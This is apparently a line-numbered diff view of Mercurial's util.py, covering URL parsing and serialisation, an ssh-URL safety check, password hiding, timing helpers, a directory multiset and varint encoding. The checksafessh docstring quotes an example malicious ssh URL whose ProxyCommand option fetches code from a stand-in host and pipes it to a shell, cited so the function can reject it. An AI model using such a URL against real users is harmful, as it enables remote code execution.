2775 return
2777 return
2776
2778
2777 if self._matchscheme(path):
2779 if self._matchscheme(path):
2778 parts = path.split(':', 1)
2780 parts = path.split(':', 1)
2779 if parts[0]:
2781 if parts[0]:
2780 self.scheme, path = parts
2782 self.scheme, path = parts
2781 self._localpath = False
2783 self._localpath = False
2782
2784
2783 if not path:
2785 if not path:
2784 path = None
2786 path = None
2785 if self._localpath:
2787 if self._localpath:
2786 self.path = ''
2788 self.path = ''
2787 return
2789 return
2788 else:
2790 else:
2789 if self._localpath:
2791 if self._localpath:
2790 self.path = path
2792 self.path = path
2791 return
2793 return
2792
2794
2793 if parsequery and '?' in path:
2795 if parsequery and '?' in path:
2794 path, self.query = path.split('?', 1)
2796 path, self.query = path.split('?', 1)
2795 if not path:
2797 if not path:
2796 path = None
2798 path = None
2797 if not self.query:
2799 if not self.query:
2798 self.query = None
2800 self.query = None
2799
2801
2800 # // is required to specify a host/authority
2802 # // is required to specify a host/authority
2801 if path and path.startswith('//'):
2803 if path and path.startswith('//'):
2802 parts = path[2:].split('/', 1)
2804 parts = path[2:].split('/', 1)
2803 if len(parts) > 1:
2805 if len(parts) > 1:
2804 self.host, path = parts
2806 self.host, path = parts
2805 else:
2807 else:
2806 self.host = parts[0]
2808 self.host = parts[0]
2807 path = None
2809 path = None
2808 if not self.host:
2810 if not self.host:
2809 self.host = None
2811 self.host = None
2810 # path of file:///d is /d
2812 # path of file:///d is /d
2811 # path of file:///d:/ is d:/, not /d:/
2813 # path of file:///d:/ is d:/, not /d:/
2812 if path and not hasdriveletter(path):
2814 if path and not hasdriveletter(path):
2813 path = '/' + path
2815 path = '/' + path
2814
2816
2815 if self.host and '@' in self.host:
2817 if self.host and '@' in self.host:
2816 self.user, self.host = self.host.rsplit('@', 1)
2818 self.user, self.host = self.host.rsplit('@', 1)
2817 if ':' in self.user:
2819 if ':' in self.user:
2818 self.user, self.passwd = self.user.split(':', 1)
2820 self.user, self.passwd = self.user.split(':', 1)
2819 if not self.host:
2821 if not self.host:
2820 self.host = None
2822 self.host = None
2821
2823
2822 # Don't split on colons in IPv6 addresses without ports
2824 # Don't split on colons in IPv6 addresses without ports
2823 if (self.host and ':' in self.host and
2825 if (self.host and ':' in self.host and
2824 not (self.host.startswith('[') and self.host.endswith(']'))):
2826 not (self.host.startswith('[') and self.host.endswith(']'))):
2825 self._hostport = self.host
2827 self._hostport = self.host
2826 self.host, self.port = self.host.rsplit(':', 1)
2828 self.host, self.port = self.host.rsplit(':', 1)
2827 if not self.host:
2829 if not self.host:
2828 self.host = None
2830 self.host = None
2829
2831
2830 if (self.host and self.scheme == 'file' and
2832 if (self.host and self.scheme == 'file' and
2831 self.host not in ('localhost', '127.0.0.1', '[::1]')):
2833 self.host not in ('localhost', '127.0.0.1', '[::1]')):
2832 raise error.Abort(_('file:// URLs can only refer to localhost'))
2834 raise error.Abort(_('file:// URLs can only refer to localhost'))
2833
2835
2834 self.path = path
2836 self.path = path
2835
2837
2836 # leave the query string escaped
2838 # leave the query string escaped
2837 for a in ('user', 'passwd', 'host', 'port',
2839 for a in ('user', 'passwd', 'host', 'port',
2838 'path', 'fragment'):
2840 'path', 'fragment'):
2839 v = getattr(self, a)
2841 v = getattr(self, a)
2840 if v is not None:
2842 if v is not None:
2841 setattr(self, a, urlreq.unquote(v))
2843 setattr(self, a, urlreq.unquote(v))
2842
2844
2843 @encoding.strmethod
2845 @encoding.strmethod
2844 def __repr__(self):
2846 def __repr__(self):
2845 attrs = []
2847 attrs = []
2846 for a in ('scheme', 'user', 'passwd', 'host', 'port', 'path',
2848 for a in ('scheme', 'user', 'passwd', 'host', 'port', 'path',
2847 'query', 'fragment'):
2849 'query', 'fragment'):
2848 v = getattr(self, a)
2850 v = getattr(self, a)
2849 if v is not None:
2851 if v is not None:
2850 attrs.append('%s: %r' % (a, pycompat.bytestr(v)))
2852 attrs.append('%s: %r' % (a, pycompat.bytestr(v)))
2851 return '<url %s>' % ', '.join(attrs)
2853 return '<url %s>' % ', '.join(attrs)
2852
2854
2853 def __bytes__(self):
2855 def __bytes__(self):
2854 r"""Join the URL's components back into a URL string.
2856 r"""Join the URL's components back into a URL string.
2855
2857
2856 Examples:
2858 Examples:
2857
2859
2858 >>> bytes(url(b'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'))
2860 >>> bytes(url(b'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'))
2859 'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'
2861 'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'
2860 >>> bytes(url(b'http://user:pw@host:80/?foo=bar&baz=42'))
2862 >>> bytes(url(b'http://user:pw@host:80/?foo=bar&baz=42'))
2861 'http://user:pw@host:80/?foo=bar&baz=42'
2863 'http://user:pw@host:80/?foo=bar&baz=42'
2862 >>> bytes(url(b'http://user:pw@host:80/?foo=bar%3dbaz'))
2864 >>> bytes(url(b'http://user:pw@host:80/?foo=bar%3dbaz'))
2863 'http://user:pw@host:80/?foo=bar%3dbaz'
2865 'http://user:pw@host:80/?foo=bar%3dbaz'
2864 >>> bytes(url(b'ssh://user:pw@[::1]:2200//home/joe#'))
2866 >>> bytes(url(b'ssh://user:pw@[::1]:2200//home/joe#'))
2865 'ssh://user:pw@[::1]:2200//home/joe#'
2867 'ssh://user:pw@[::1]:2200//home/joe#'
2866 >>> bytes(url(b'http://localhost:80//'))
2868 >>> bytes(url(b'http://localhost:80//'))
2867 'http://localhost:80//'
2869 'http://localhost:80//'
2868 >>> bytes(url(b'http://localhost:80/'))
2870 >>> bytes(url(b'http://localhost:80/'))
2869 'http://localhost:80/'
2871 'http://localhost:80/'
2870 >>> bytes(url(b'http://localhost:80'))
2872 >>> bytes(url(b'http://localhost:80'))
2871 'http://localhost:80/'
2873 'http://localhost:80/'
2872 >>> bytes(url(b'bundle:foo'))
2874 >>> bytes(url(b'bundle:foo'))
2873 'bundle:foo'
2875 'bundle:foo'
2874 >>> bytes(url(b'bundle://../foo'))
2876 >>> bytes(url(b'bundle://../foo'))
2875 'bundle:../foo'
2877 'bundle:../foo'
2876 >>> bytes(url(b'path'))
2878 >>> bytes(url(b'path'))
2877 'path'
2879 'path'
2878 >>> bytes(url(b'file:///tmp/foo/bar'))
2880 >>> bytes(url(b'file:///tmp/foo/bar'))
2879 'file:///tmp/foo/bar'
2881 'file:///tmp/foo/bar'
2880 >>> bytes(url(b'file:///c:/tmp/foo/bar'))
2882 >>> bytes(url(b'file:///c:/tmp/foo/bar'))
2881 'file:///c:/tmp/foo/bar'
2883 'file:///c:/tmp/foo/bar'
2882 >>> print(url(br'bundle:foo\bar'))
2884 >>> print(url(br'bundle:foo\bar'))
2883 bundle:foo\bar
2885 bundle:foo\bar
2884 >>> print(url(br'file:///D:\data\hg'))
2886 >>> print(url(br'file:///D:\data\hg'))
2885 file:///D:\data\hg
2887 file:///D:\data\hg
2886 """
2888 """
2887 if self._localpath:
2889 if self._localpath:
2888 s = self.path
2890 s = self.path
2889 if self.scheme == 'bundle':
2891 if self.scheme == 'bundle':
2890 s = 'bundle:' + s
2892 s = 'bundle:' + s
2891 if self.fragment:
2893 if self.fragment:
2892 s += '#' + self.fragment
2894 s += '#' + self.fragment
2893 return s
2895 return s
2894
2896
2895 s = self.scheme + ':'
2897 s = self.scheme + ':'
2896 if self.user or self.passwd or self.host:
2898 if self.user or self.passwd or self.host:
2897 s += '//'
2899 s += '//'
2898 elif self.scheme and (not self.path or self.path.startswith('/')
2900 elif self.scheme and (not self.path or self.path.startswith('/')
2899 or hasdriveletter(self.path)):
2901 or hasdriveletter(self.path)):
2900 s += '//'
2902 s += '//'
2901 if hasdriveletter(self.path):
2903 if hasdriveletter(self.path):
2902 s += '/'
2904 s += '/'
2903 if self.user:
2905 if self.user:
2904 s += urlreq.quote(self.user, safe=self._safechars)
2906 s += urlreq.quote(self.user, safe=self._safechars)
2905 if self.passwd:
2907 if self.passwd:
2906 s += ':' + urlreq.quote(self.passwd, safe=self._safechars)
2908 s += ':' + urlreq.quote(self.passwd, safe=self._safechars)
2907 if self.user or self.passwd:
2909 if self.user or self.passwd:
2908 s += '@'
2910 s += '@'
2909 if self.host:
2911 if self.host:
2910 if not (self.host.startswith('[') and self.host.endswith(']')):
2912 if not (self.host.startswith('[') and self.host.endswith(']')):
2911 s += urlreq.quote(self.host)
2913 s += urlreq.quote(self.host)
2912 else:
2914 else:
2913 s += self.host
2915 s += self.host
2914 if self.port:
2916 if self.port:
2915 s += ':' + urlreq.quote(self.port)
2917 s += ':' + urlreq.quote(self.port)
2916 if self.host:
2918 if self.host:
2917 s += '/'
2919 s += '/'
2918 if self.path:
2920 if self.path:
2919 # TODO: similar to the query string, we should not unescape the
2921 # TODO: similar to the query string, we should not unescape the
2920 # path when we store it, the path might contain '%2f' = '/',
2922 # path when we store it, the path might contain '%2f' = '/',
2921 # which we should *not* escape.
2923 # which we should *not* escape.
2922 s += urlreq.quote(self.path, safe=self._safepchars)
2924 s += urlreq.quote(self.path, safe=self._safepchars)
2923 if self.query:
2925 if self.query:
2924 # we store the query in escaped form.
2926 # we store the query in escaped form.
2925 s += '?' + self.query
2927 s += '?' + self.query
2926 if self.fragment is not None:
2928 if self.fragment is not None:
2927 s += '#' + urlreq.quote(self.fragment, safe=self._safepchars)
2929 s += '#' + urlreq.quote(self.fragment, safe=self._safepchars)
2928 return s
2930 return s
2929
2931
2930 __str__ = encoding.strmethod(__bytes__)
2932 __str__ = encoding.strmethod(__bytes__)
2931
2933
2932 def authinfo(self):
2934 def authinfo(self):
2933 user, passwd = self.user, self.passwd
2935 user, passwd = self.user, self.passwd
2934 try:
2936 try:
2935 self.user, self.passwd = None, None
2937 self.user, self.passwd = None, None
2936 s = bytes(self)
2938 s = bytes(self)
2937 finally:
2939 finally:
2938 self.user, self.passwd = user, passwd
2940 self.user, self.passwd = user, passwd
2939 if not self.user:
2941 if not self.user:
2940 return (s, None)
2942 return (s, None)
2941 # authinfo[1] is passed to urllib2 password manager, and its
2943 # authinfo[1] is passed to urllib2 password manager, and its
2942 # URIs must not contain credentials. The host is passed in the
2944 # URIs must not contain credentials. The host is passed in the
2943 # URIs list because Python < 2.4.3 uses only that to search for
2945 # URIs list because Python < 2.4.3 uses only that to search for
2944 # a password.
2946 # a password.
2945 return (s, (None, (s, self.host),
2947 return (s, (None, (s, self.host),
2946 self.user, self.passwd or ''))
2948 self.user, self.passwd or ''))
2947
2949
2948 def isabs(self):
2950 def isabs(self):
2949 if self.scheme and self.scheme != 'file':
2951 if self.scheme and self.scheme != 'file':
2950 return True # remote URL
2952 return True # remote URL
2951 if hasdriveletter(self.path):
2953 if hasdriveletter(self.path):
2952 return True # absolute for our purposes - can't be joined()
2954 return True # absolute for our purposes - can't be joined()
2953 if self.path.startswith(br'\\'):
2955 if self.path.startswith(br'\\'):
2954 return True # Windows UNC path
2956 return True # Windows UNC path
2955 if self.path.startswith('/'):
2957 if self.path.startswith('/'):
2956 return True # POSIX-style
2958 return True # POSIX-style
2957 return False
2959 return False
2958
2960
2959 def localpath(self):
2961 def localpath(self):
2960 if self.scheme == 'file' or self.scheme == 'bundle':
2962 if self.scheme == 'file' or self.scheme == 'bundle':
2961 path = self.path or '/'
2963 path = self.path or '/'
2962 # For Windows, we need to promote hosts containing drive
2964 # For Windows, we need to promote hosts containing drive
2963 # letters to paths with drive letters.
2965 # letters to paths with drive letters.
2964 if hasdriveletter(self._hostport):
2966 if hasdriveletter(self._hostport):
2965 path = self._hostport + '/' + self.path
2967 path = self._hostport + '/' + self.path
2966 elif (self.host is not None and self.path
2968 elif (self.host is not None and self.path
2967 and not hasdriveletter(path)):
2969 and not hasdriveletter(path)):
2968 path = '/' + path
2970 path = '/' + path
2969 return path
2971 return path
2970 return self._origpath
2972 return self._origpath
2971
2973
2972 def islocal(self):
2974 def islocal(self):
2973 '''whether localpath will return something that posixfile can open'''
2975 '''whether localpath will return something that posixfile can open'''
2974 return (not self.scheme or self.scheme == 'file'
2976 return (not self.scheme or self.scheme == 'file'
2975 or self.scheme == 'bundle')
2977 or self.scheme == 'bundle')
2976
2978
2977 def hasscheme(path):
2979 def hasscheme(path):
2978 return bool(url(path).scheme)
2980 return bool(url(path).scheme)
2979
2981
2980 def hasdriveletter(path):
2982 def hasdriveletter(path):
2981 return path and path[1:2] == ':' and path[0:1].isalpha()
2983 return path and path[1:2] == ':' and path[0:1].isalpha()
2982
2984
2983 def urllocalpath(path):
2985 def urllocalpath(path):
2984 return url(path, parsequery=False, parsefragment=False).localpath()
2986 return url(path, parsequery=False, parsefragment=False).localpath()
2985
2987
2986 def checksafessh(path):
2988 def checksafessh(path):
2987 """check if a path / url is a potentially unsafe ssh exploit (SEC)
2989 """check if a path / url is a potentially unsafe ssh exploit (SEC)
2988
2990
2989 This is a sanity check for ssh urls. ssh will parse the first item as
2991 This is a sanity check for ssh urls. ssh will parse the first item as
2990 an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path.
2992 an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path.
2991 Let's prevent these potentially exploited urls entirely and warn the
2993 Let's prevent these potentially exploited urls entirely and warn the
2992 user.
2994 user.
2993
2995
2994 Raises an error.Abort when the url is unsafe.
2996 Raises an error.Abort when the url is unsafe.
2995 """
2997 """
2996 path = urlreq.unquote(path)
2998 path = urlreq.unquote(path)
2997 if path.startswith('ssh://-') or path.startswith('svn+ssh://-'):
2999 if path.startswith('ssh://-') or path.startswith('svn+ssh://-'):
2998 raise error.Abort(_('potentially unsafe url: %r') %
3000 raise error.Abort(_('potentially unsafe url: %r') %
2999 (pycompat.bytestr(path),))
3001 (pycompat.bytestr(path),))
3000
3002
3001 def hidepassword(u):
3003 def hidepassword(u):
3002 '''hide user credential in a url string'''
3004 '''hide user credential in a url string'''
3003 u = url(u)
3005 u = url(u)
3004 if u.passwd:
3006 if u.passwd:
3005 u.passwd = '***'
3007 u.passwd = '***'
3006 return bytes(u)
3008 return bytes(u)
3007
3009
3008 def removeauth(u):
3010 def removeauth(u):
3009 '''remove all authentication information from a url string'''
3011 '''remove all authentication information from a url string'''
3010 u = url(u)
3012 u = url(u)
3011 u.user = u.passwd = None
3013 u.user = u.passwd = None
3012 return bytes(u)
3014 return bytes(u)
3013
3015
3014 timecount = unitcountfn(
3016 timecount = unitcountfn(
3015 (1, 1e3, _('%.0f s')),
3017 (1, 1e3, _('%.0f s')),
3016 (100, 1, _('%.1f s')),
3018 (100, 1, _('%.1f s')),
3017 (10, 1, _('%.2f s')),
3019 (10, 1, _('%.2f s')),
3018 (1, 1, _('%.3f s')),
3020 (1, 1, _('%.3f s')),
3019 (100, 0.001, _('%.1f ms')),
3021 (100, 0.001, _('%.1f ms')),
3020 (10, 0.001, _('%.2f ms')),
3022 (10, 0.001, _('%.2f ms')),
3021 (1, 0.001, _('%.3f ms')),
3023 (1, 0.001, _('%.3f ms')),
3022 (100, 0.000001, _('%.1f us')),
3024 (100, 0.000001, _('%.1f us')),
3023 (10, 0.000001, _('%.2f us')),
3025 (10, 0.000001, _('%.2f us')),
3024 (1, 0.000001, _('%.3f us')),
3026 (1, 0.000001, _('%.3f us')),
3025 (100, 0.000000001, _('%.1f ns')),
3027 (100, 0.000000001, _('%.1f ns')),
3026 (10, 0.000000001, _('%.2f ns')),
3028 (10, 0.000000001, _('%.2f ns')),
3027 (1, 0.000000001, _('%.3f ns')),
3029 (1, 0.000000001, _('%.3f ns')),
3028 )
3030 )
3029
3031
3030 @attr.s
3032 @attr.s
3031 class timedcmstats(object):
3033 class timedcmstats(object):
3032 """Stats information produced by the timedcm context manager on entering."""
3034 """Stats information produced by the timedcm context manager on entering."""
3033
3035
3034 # the starting value of the timer as a float (meaning and resulution is
3036 # the starting value of the timer as a float (meaning and resulution is
3035 # platform dependent, see util.timer)
3037 # platform dependent, see util.timer)
3036 start = attr.ib(default=attr.Factory(lambda: timer()))
3038 start = attr.ib(default=attr.Factory(lambda: timer()))
3037 # the number of seconds as a floating point value; starts at 0, updated when
3039 # the number of seconds as a floating point value; starts at 0, updated when
3038 # the context is exited.
3040 # the context is exited.
3039 elapsed = attr.ib(default=0)
3041 elapsed = attr.ib(default=0)
3040 # the number of nested timedcm context managers.
3042 # the number of nested timedcm context managers.
3041 level = attr.ib(default=1)
3043 level = attr.ib(default=1)
3042
3044
3043 def __bytes__(self):
3045 def __bytes__(self):
3044 return timecount(self.elapsed) if self.elapsed else '<unknown>'
3046 return timecount(self.elapsed) if self.elapsed else '<unknown>'
3045
3047
3046 __str__ = encoding.strmethod(__bytes__)
3048 __str__ = encoding.strmethod(__bytes__)
3047
3049
3048 @contextlib.contextmanager
3050 @contextlib.contextmanager
3049 def timedcm(whencefmt, *whenceargs):
3051 def timedcm(whencefmt, *whenceargs):
3050 """A context manager that produces timing information for a given context.
3052 """A context manager that produces timing information for a given context.
3051
3053
3052 On entering a timedcmstats instance is produced.
3054 On entering a timedcmstats instance is produced.
3053
3055
3054 This context manager is reentrant.
3056 This context manager is reentrant.
3055
3057
3056 """
3058 """
3057 # track nested context managers
3059 # track nested context managers
3058 timedcm._nested += 1
3060 timedcm._nested += 1
3059 timing_stats = timedcmstats(level=timedcm._nested)
3061 timing_stats = timedcmstats(level=timedcm._nested)
3060 try:
3062 try:
3061 with tracing.log(whencefmt, *whenceargs):
3063 with tracing.log(whencefmt, *whenceargs):
3062 yield timing_stats
3064 yield timing_stats
3063 finally:
3065 finally:
3064 timing_stats.elapsed = timer() - timing_stats.start
3066 timing_stats.elapsed = timer() - timing_stats.start
3065 timedcm._nested -= 1
3067 timedcm._nested -= 1
3066
3068
3067 timedcm._nested = 0
3069 timedcm._nested = 0
3068
3070
3069 def timed(func):
3071 def timed(func):
3070 '''Report the execution time of a function call to stderr.
3072 '''Report the execution time of a function call to stderr.
3071
3073
3072 During development, use as a decorator when you need to measure
3074 During development, use as a decorator when you need to measure
3073 the cost of a function, e.g. as follows:
3075 the cost of a function, e.g. as follows:
3074
3076
3075 @util.timed
3077 @util.timed
3076 def foo(a, b, c):
3078 def foo(a, b, c):
3077 pass
3079 pass
3078 '''
3080 '''
3079
3081
3080 def wrapper(*args, **kwargs):
3082 def wrapper(*args, **kwargs):
3081 with timedcm(pycompat.bytestr(func.__name__)) as time_stats:
3083 with timedcm(pycompat.bytestr(func.__name__)) as time_stats:
3082 result = func(*args, **kwargs)
3084 result = func(*args, **kwargs)
3083 stderr = procutil.stderr
3085 stderr = procutil.stderr
3084 stderr.write('%s%s: %s\n' % (
3086 stderr.write('%s%s: %s\n' % (
3085 ' ' * time_stats.level * 2, pycompat.bytestr(func.__name__),
3087 ' ' * time_stats.level * 2, pycompat.bytestr(func.__name__),
3086 time_stats))
3088 time_stats))
3087 return result
3089 return result
3088 return wrapper
3090 return wrapper
3089
3091
3090 _sizeunits = (('m', 2**20), ('k', 2**10), ('g', 2**30),
3092 _sizeunits = (('m', 2**20), ('k', 2**10), ('g', 2**30),
3091 ('kb', 2**10), ('mb', 2**20), ('gb', 2**30), ('b', 1))
3093 ('kb', 2**10), ('mb', 2**20), ('gb', 2**30), ('b', 1))
3092
3094
3093 def sizetoint(s):
3095 def sizetoint(s):
3094 '''Convert a space specifier to a byte count.
3096 '''Convert a space specifier to a byte count.
3095
3097
3096 >>> sizetoint(b'30')
3098 >>> sizetoint(b'30')
3097 30
3099 30
3098 >>> sizetoint(b'2.2kb')
3100 >>> sizetoint(b'2.2kb')
3099 2252
3101 2252
3100 >>> sizetoint(b'6M')
3102 >>> sizetoint(b'6M')
3101 6291456
3103 6291456
3102 '''
3104 '''
3103 t = s.strip().lower()
3105 t = s.strip().lower()
3104 try:
3106 try:
3105 for k, u in _sizeunits:
3107 for k, u in _sizeunits:
3106 if t.endswith(k):
3108 if t.endswith(k):
3107 return int(float(t[:-len(k)]) * u)
3109 return int(float(t[:-len(k)]) * u)
3108 return int(t)
3110 return int(t)
3109 except ValueError:
3111 except ValueError:
3110 raise error.ParseError(_("couldn't parse size: %s") % s)
3112 raise error.ParseError(_("couldn't parse size: %s") % s)
3111
3113
3112 class hooks(object):
3114 class hooks(object):
3113 '''A collection of hook functions that can be used to extend a
3115 '''A collection of hook functions that can be used to extend a
3114 function's behavior. Hooks are called in lexicographic order,
3116 function's behavior. Hooks are called in lexicographic order,
3115 based on the names of their sources.'''
3117 based on the names of their sources.'''
3116
3118
3117 def __init__(self):
3119 def __init__(self):
3118 self._hooks = []
3120 self._hooks = []
3119
3121
3120 def add(self, source, hook):
3122 def add(self, source, hook):
3121 self._hooks.append((source, hook))
3123 self._hooks.append((source, hook))
3122
3124
3123 def __call__(self, *args):
3125 def __call__(self, *args):
3124 self._hooks.sort(key=lambda x: x[0])
3126 self._hooks.sort(key=lambda x: x[0])
3125 results = []
3127 results = []
3126 for source, hook in self._hooks:
3128 for source, hook in self._hooks:
3127 results.append(hook(*args))
3129 results.append(hook(*args))
3128 return results
3130 return results
3129
3131
3130 def getstackframes(skip=0, line=' %-*s in %s\n', fileline='%s:%d', depth=0):
3132 def getstackframes(skip=0, line=' %-*s in %s\n', fileline='%s:%d', depth=0):
3131 '''Yields lines for a nicely formatted stacktrace.
3133 '''Yields lines for a nicely formatted stacktrace.
3132 Skips the 'skip' last entries, then return the last 'depth' entries.
3134 Skips the 'skip' last entries, then return the last 'depth' entries.
3133 Each file+linenumber is formatted according to fileline.
3135 Each file+linenumber is formatted according to fileline.
3134 Each line is formatted according to line.
3136 Each line is formatted according to line.
3135 If line is None, it yields:
3137 If line is None, it yields:
3136 length of longest filepath+line number,
3138 length of longest filepath+line number,
3137 filepath+linenumber,
3139 filepath+linenumber,
3138 function
3140 function
3139
3141
3140 Not be used in production code but very convenient while developing.
3142 Not be used in production code but very convenient while developing.
3141 '''
3143 '''
3142 entries = [(fileline % (pycompat.sysbytes(fn), ln), pycompat.sysbytes(func))
3144 entries = [(fileline % (pycompat.sysbytes(fn), ln), pycompat.sysbytes(func))
3143 for fn, ln, func, _text in traceback.extract_stack()[:-skip - 1]
3145 for fn, ln, func, _text in traceback.extract_stack()[:-skip - 1]
3144 ][-depth:]
3146 ][-depth:]
3145 if entries:
3147 if entries:
3146 fnmax = max(len(entry[0]) for entry in entries)
3148 fnmax = max(len(entry[0]) for entry in entries)
3147 for fnln, func in entries:
3149 for fnln, func in entries:
3148 if line is None:
3150 if line is None:
3149 yield (fnmax, fnln, func)
3151 yield (fnmax, fnln, func)
3150 else:
3152 else:
3151 yield line % (fnmax, fnln, func)
3153 yield line % (fnmax, fnln, func)
3152
3154
3153 def debugstacktrace(msg='stacktrace', skip=0,
3155 def debugstacktrace(msg='stacktrace', skip=0,
3154 f=procutil.stderr, otherf=procutil.stdout, depth=0):
3156 f=procutil.stderr, otherf=procutil.stdout, depth=0):
3155 '''Writes a message to f (stderr) with a nicely formatted stacktrace.
3157 '''Writes a message to f (stderr) with a nicely formatted stacktrace.
3156 Skips the 'skip' entries closest to the call, then show 'depth' entries.
3158 Skips the 'skip' entries closest to the call, then show 'depth' entries.
3157 By default it will flush stdout first.
3159 By default it will flush stdout first.
3158 It can be used everywhere and intentionally does not require an ui object.
3160 It can be used everywhere and intentionally does not require an ui object.
3159 Not be used in production code but very convenient while developing.
3161 Not be used in production code but very convenient while developing.
3160 '''
3162 '''
3161 if otherf:
3163 if otherf:
3162 otherf.flush()
3164 otherf.flush()
3163 f.write('%s at:\n' % msg.rstrip())
3165 f.write('%s at:\n' % msg.rstrip())
3164 for line in getstackframes(skip + 1, depth=depth):
3166 for line in getstackframes(skip + 1, depth=depth):
3165 f.write(line)
3167 f.write(line)
3166 f.flush()
3168 f.flush()
3167
3169
3168 class dirs(object):
3170 class dirs(object):
3169 '''a multiset of directory names from a dirstate or manifest'''
3171 '''a multiset of directory names from a dirstate or manifest'''
3170
3172
3171 def __init__(self, map, skip=None):
3173 def __init__(self, map, skip=None):
3172 self._dirs = {}
3174 self._dirs = {}
3173 addpath = self.addpath
3175 addpath = self.addpath
3174 if safehasattr(map, 'iteritems') and skip is not None:
3176 if safehasattr(map, 'iteritems') and skip is not None:
3175 for f, s in map.iteritems():
3177 for f, s in map.iteritems():
3176 if s[0] != skip:
3178 if s[0] != skip:
3177 addpath(f)
3179 addpath(f)
3178 else:
3180 else:
3179 for f in map:
3181 for f in map:
3180 addpath(f)
3182 addpath(f)
3181
3183
3182 def addpath(self, path):
3184 def addpath(self, path):
3183 dirs = self._dirs
3185 dirs = self._dirs
3184 for base in finddirs(path):
3186 for base in finddirs(path):
3185 if base in dirs:
3187 if base in dirs:
3186 dirs[base] += 1
3188 dirs[base] += 1
3187 return
3189 return
3188 dirs[base] = 1
3190 dirs[base] = 1
3189
3191
3190 def delpath(self, path):
3192 def delpath(self, path):
3191 dirs = self._dirs
3193 dirs = self._dirs
3192 for base in finddirs(path):
3194 for base in finddirs(path):
3193 if dirs[base] > 1:
3195 if dirs[base] > 1:
3194 dirs[base] -= 1
3196 dirs[base] -= 1
3195 return
3197 return
3196 del dirs[base]
3198 del dirs[base]
3197
3199
3198 def __iter__(self):
3200 def __iter__(self):
3199 return iter(self._dirs)
3201 return iter(self._dirs)
3200
3202
3201 def __contains__(self, d):
3203 def __contains__(self, d):
3202 return d in self._dirs
3204 return d in self._dirs
3203
3205
3204 if safehasattr(parsers, 'dirs'):
3206 if safehasattr(parsers, 'dirs'):
3205 dirs = parsers.dirs
3207 dirs = parsers.dirs
3206
3208
3209 if rustdirs is not None:
3210 dirs = rustdirs
3211
3207 def finddirs(path):
3212 def finddirs(path):
3208 pos = path.rfind('/')
3213 pos = path.rfind('/')
3209 while pos != -1:
3214 while pos != -1:
3210 yield path[:pos]
3215 yield path[:pos]
3211 pos = path.rfind('/', 0, pos)
3216 pos = path.rfind('/', 0, pos)
3212 yield ''
3217 yield ''
3213
3218
3214
3219
3215 # convenient shortcut
3220 # convenient shortcut
3216 dst = debugstacktrace
3221 dst = debugstacktrace
3217
3222
3218 def safename(f, tag, ctx, others=None):
3223 def safename(f, tag, ctx, others=None):
3219 """
3224 """
3220 Generate a name that it is safe to rename f to in the given context.
3225 Generate a name that it is safe to rename f to in the given context.
3221
3226
3222 f: filename to rename
3227 f: filename to rename
3223 tag: a string tag that will be included in the new name
3228 tag: a string tag that will be included in the new name
3224 ctx: a context, in which the new name must not exist
3229 ctx: a context, in which the new name must not exist
3225 others: a set of other filenames that the new name must not be in
3230 others: a set of other filenames that the new name must not be in
3226
3231
3227 Returns a file name of the form oldname~tag[~number] which does not exist
3232 Returns a file name of the form oldname~tag[~number] which does not exist
3228 in the provided context and is not in the set of other names.
3233 in the provided context and is not in the set of other names.
3229 """
3234 """
3230 if others is None:
3235 if others is None:
3231 others = set()
3236 others = set()
3232
3237
3233 fn = '%s~%s' % (f, tag)
3238 fn = '%s~%s' % (f, tag)
3234 if fn not in ctx and fn not in others:
3239 if fn not in ctx and fn not in others:
3235 return fn
3240 return fn
3236 for n in itertools.count(1):
3241 for n in itertools.count(1):
3237 fn = '%s~%s~%s' % (f, tag, n)
3242 fn = '%s~%s~%s' % (f, tag, n)
3238 if fn not in ctx and fn not in others:
3243 if fn not in ctx and fn not in others:
3239 return fn
3244 return fn
3240
3245
3241 def readexactly(stream, n):
3246 def readexactly(stream, n):
3242 '''read n bytes from stream.read and abort if less was available'''
3247 '''read n bytes from stream.read and abort if less was available'''
3243 s = stream.read(n)
3248 s = stream.read(n)
3244 if len(s) < n:
3249 if len(s) < n:
3245 raise error.Abort(_("stream ended unexpectedly"
3250 raise error.Abort(_("stream ended unexpectedly"
3246 " (got %d bytes, expected %d)")
3251 " (got %d bytes, expected %d)")
3247 % (len(s), n))
3252 % (len(s), n))
3248 return s
3253 return s
3249
3254
3250 def uvarintencode(value):
3255 def uvarintencode(value):
3251 """Encode an unsigned integer value to a varint.
3256 """Encode an unsigned integer value to a varint.
3252
3257
3253 A varint is a variable length integer of 1 or more bytes. Each byte
3258 A varint is a variable length integer of 1 or more bytes. Each byte
3254 except the last has the most significant bit set. The lower 7 bits of
3259 except the last has the most significant bit set. The lower 7 bits of
3255 each byte store the 2's complement representation, least significant group
3260 each byte store the 2's complement representation, least significant group
3256 first.
3261 first.
3257
3262
3258 >>> uvarintencode(0)
3263 >>> uvarintencode(0)
3259 '\\x00'
3264 '\\x00'
3260 >>> uvarintencode(1)
3265 >>> uvarintencode(1)
3261 '\\x01'
3266 '\\x01'
3262 >>> uvarintencode(127)
3267 >>> uvarintencode(127)
3263 '\\x7f'
3268 '\\x7f'
3264 >>> uvarintencode(1337)
3269 >>> uvarintencode(1337)
3265 '\\xb9\\n'
3270 '\\xb9\\n'
3266 >>> uvarintencode(65536)
3271 >>> uvarintencode(65536)
3267 '\\x80\\x80\\x04'
3272 '\\x80\\x80\\x04'
3268 >>> uvarintencode(-1)
3273 >>> uvarintencode(-1)
3269 Traceback (most recent call last):
3274 Traceback (most recent call last):
3270 ...
3275 ...
3271 ProgrammingError: negative value for uvarint: -1
3276 ProgrammingError: negative value for uvarint: -1
3272 """
3277 """
3273 if value < 0:
3278 if value < 0:
3274 raise error.ProgrammingError('negative value for uvarint: %d'
3279 raise error.ProgrammingError('negative value for uvarint: %d'
3275 % value)
3280 % value)
3276 bits = value & 0x7f
3281 bits = value & 0x7f
3277 value >>= 7
3282 value >>= 7
3278 bytes = []
3283 bytes = []
3279 while value:
3284 while value:
3280 bytes.append(pycompat.bytechr(0x80 | bits))
3285 bytes.append(pycompat.bytechr(0x80 | bits))
3281 bits = value & 0x7f
3286 bits = value & 0x7f
3282 value >>= 7
3287 value >>= 7
3283 bytes.append(pycompat.bytechr(bits))
3288 bytes.append(pycompat.bytechr(bits))
3284
3289
3285 return ''.join(bytes)
3290 return ''.join(bytes)
3286
3291
